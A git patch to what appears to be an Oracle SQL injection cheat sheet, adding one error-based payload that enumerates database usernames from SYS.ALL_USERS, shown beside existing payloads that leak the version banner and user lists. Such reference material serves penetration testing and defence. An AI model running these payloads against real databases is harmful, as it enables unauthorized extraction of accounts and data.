From 11dc7bc2c2921da339ad4907b6461b5567b699d8 Mon Sep 17 00:00:00 2001
From: jaxBCD <43739719+jaxBCD@users.noreply.github.com>
Date: Mon, 4 Oct 2021 22:52:48 +0700
Subject: [PATCH] Update Oracle Sql injection.md add sql error

Add some error point oracle sql injection
---
 SQL Injection/OracleSQL Injection.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md
index 633e24c..45c0d66 100644
--- a/SQL Injection/OracleSQL Injection.md	
+++ b/SQL Injection/OracleSQL Injection.md	
@@ -58,6 +58,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
 | Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual |
 | Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
+| SQL Error             | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) |
+
 
 ## Oracle SQL Blind